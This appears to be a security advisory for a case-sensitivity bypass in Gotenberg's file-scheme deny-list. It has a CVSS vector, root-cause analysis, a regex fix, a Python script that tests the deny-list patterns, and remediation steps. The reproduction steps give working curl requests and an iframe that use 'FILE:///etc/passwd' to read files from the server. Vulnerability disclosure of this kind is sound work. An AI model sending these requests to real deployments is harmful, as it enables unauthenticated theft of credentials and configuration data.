CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Description
### Impact

The fix introduced in version 8.1.0 for GHSA-rh2x-ccvw-q7r3 (CVE-2024-21527) can be bypassed using mixed-case or uppercase URL schemes.

The default `--chromium-deny-list` value is `^file:(?!//\/tmp/).*`. This regex is anchored to lowercase `file:` at the start. However, per RFC 3986 Section 3.1, URI schemes are case-insensitive. Chromium normalizes the scheme to lowercase before navigation, so a URL like `FILE:///etc/passwd` or `File:///etc/passwd` bypasses the deny-list check but still gets resolved by Chromium as `file:///etc/passwd`.

The root cause is in `pkg/gotenberg/filter.go`: the `FilterDeadline` function compiles the deny-list regex with `regexp2.MustCompile(denied.String(), 0)`, where `0` means no flags (case-sensitive). Since the regex pattern itself doesn't include a `(?i)` flag, matching is strictly case-sensitive.

This affects both the URL endpoint and HTML conversion (via iframes, link tags, etc.).

### Steps to Reproduce

1. Start Gotenberg with default settings:

   ```bash
   docker run --rm -p 3000:3000 gotenberg/gotenberg:8.26.0 gotenberg
   ```

2. Read `/etc/passwd` via the URL endpoint using an uppercase scheme:

   ```bash
   curl -X POST 'http://localhost:3000/forms/chromium/convert/url' \
     --form 'url=FILE:///etc/passwd' -o output.pdf
   ```

3. Open `output.pdf`; it contains the contents of `/etc/passwd`.

4. Alternatively, create an `index.html`:

   ```html
   <iframe src="FILE:///etc/passwd" width="100%" height="100%"></iframe>
   ```

   Then convert it:

   ```bash
   curl -X POST 'http://localhost:3000/forms/chromium/convert/html' \
     -F 'files=@index.html' -o output.pdf
   ```

5. The resulting PDF contains the `/etc/passwd` contents.

Mixed-case variants like `File:`, `fILE:`, `fiLE:` etc. all work as well.
### Root Cause

- `pkg/modules/chromium/chromium.go` defines the default deny-list as `^file:(?!//\/tmp/).*`
- `pkg/gotenberg/filter.go` compiles this with `regexp2.MustCompile(denied.String(), 0)`; flag `0` means case-sensitive
- `pkg/modules/chromium/events.go` uses `FilterDeadline` to check intercepted request URLs against the deny-list
- Chromium normalizes URL schemes to lowercase, so `FILE:///etc/passwd` becomes `file:///etc/passwd` after the deny-list check has already passed

### Suggested Fix

Change the default deny-list regex to use a case-insensitive flag:

```
(?i)^file:(?!//\/tmp/).*
```

Or apply case-insensitive matching in `FilterDeadline` when compiling the regex.

### Severity

This is effectively the same impact as CVE-2024-21527: unauthenticated arbitrary file read from the Gotenberg container. An attacker can leak environment variables, configuration, credentials, and other sensitive data.
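To make the root cause and the two candidate fixes concrete, the following is an added example, not Gotenberg's own code. It applies the advisory's default deny-list pattern and the suggested `(?i)` pattern to a constructed set of URLs, and also models the alternative fix of lowercasing the scheme before matching (as Chromium itself does before navigation). Python's `re` module stands in for `regexp2` because both accept the same negative-lookahead and `(?i)` syntax used here; `is_denied`, `classify`, `bypasses`, `deny_list_blocks_all_case_variants` and the sample URL list are illustrative names and values, not part of Gotenberg.

```python
import re
from urllib.parse import urlsplit

# Default --chromium-deny-list quoted in the advisory (Gotenberg 8.1.0 - 8.28.x).
DEFAULT_DENY_LIST = r"^file:(?!//\/tmp/).*"
# The advisory's suggested fix: the same pattern with a case-insensitive flag.
FIXED_DENY_LIST = r"(?i)^file:(?!//\/tmp/).*"

# Constructed sample URLs (not from any real deployment): the case variants the
# advisory names, the /tmp/ exception the pattern allows on purpose, and one
# non-file URL as a control.
SAMPLE_URLS = [
    "file:///etc/passwd",
    "FILE:///etc/passwd",
    "File:///etc/passwd",
    "fILE:///etc/passwd",
    "file:///tmp/report.html",
    "FILE:///tmp/report.html",
    "https://example.com/",
]


def is_denied(url: str, pattern: str, normalize_scheme: bool = False) -> bool:
    """Return True when the deny-list pattern matches the URL (request blocked).

    Hypothetical stand-in for the FilterDeadline check. With
    normalize_scheme=True the scheme is lowercased before matching, which
    models the alternative fix: normalise the way Chromium does before the
    deny-list ever sees the URL.
    """
    if normalize_scheme:
        scheme = urlsplit(url).scheme  # urlsplit already lowercases the scheme
        if scheme:
            url = scheme + url[len(scheme):]
    return re.search(pattern, url) is not None


def classify(pattern: str, normalize_scheme: bool = False) -> dict:
    """Map each sample URL to whether `pattern` denies it."""
    return {u: is_denied(u, pattern, normalize_scheme) for u in SAMPLE_URLS}


def bypasses(default_pattern: str = DEFAULT_DENY_LIST,
             fixed_pattern: str = FIXED_DENY_LIST) -> list:
    """Sample URLs the fixed list denies but the shipped default lets through."""
    return [u for u in SAMPLE_URLS
            if is_denied(u, fixed_pattern) and not is_denied(u, default_pattern)]


def deny_list_blocks_all_case_variants(pattern: str, path: str = "/etc/hostname") -> bool:
    """Operator check for a configured --chromium-deny-list value: does it deny
    every case spelling of the file scheme for a path outside /tmp/?"""
    spellings = ["file", "FILE", "File", "fILE", "FiLe"]
    return all(is_denied(f"{s}://{path}", pattern) for s in spellings)


if __name__ == "__main__":
    for name, pat in (("default", DEFAULT_DENY_LIST), ("fixed", FIXED_DENY_LIST)):
        print(f"--- {name} deny-list ---")
        for url, denied in classify(pat).items():
            print(f"{'DENY ' if denied else 'ALLOW'} {url}")
    print("case variants let through by the default list:", bypasses())
    print("default list case-safe:", deny_list_blocks_all_case_variants(DEFAULT_DENY_LIST))
    print("fixed list case-safe:  ", deny_list_blocks_all_case_variants(FIXED_DENY_LIST))
```

Running it shows the default pattern denying only the all-lowercase `file:///etc/passwd` while the three case variants are allowed, and both the `(?i)` pattern and scheme normalisation closing that gap without changing the intended `/tmp/` exception. `deny_list_blocks_all_case_variants` is the kind of check an operator can run against a custom `--chromium-deny-list` value before deploying it, since a hand-written pattern without `(?i)` has the same weakness as the shipped default.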
Analysis
Gotenberg PDF conversion service versions 8.1.0-8.28.x allow unauthenticated arbitrary file disclosure through case-variant URI scheme bypass. A previous CVE-2024-21527 patch implemented a case-sensitive deny-list regex (^file:(?!//\/tmp/).*) to block file:// access, but attackers can bypass it using FILE://, File://, or other mixed-case variants. …
Remediation
Within 24 hours: Identify all Gotenberg instances in production and confirm version numbers (8.1.0-8.28.x are vulnerable). Within 7 days: Upgrade all affected Gotenberg deployments to version 8.29.0 or later. …
EUVD-2026-17198
GHSA-jjwv-57xh-xr6r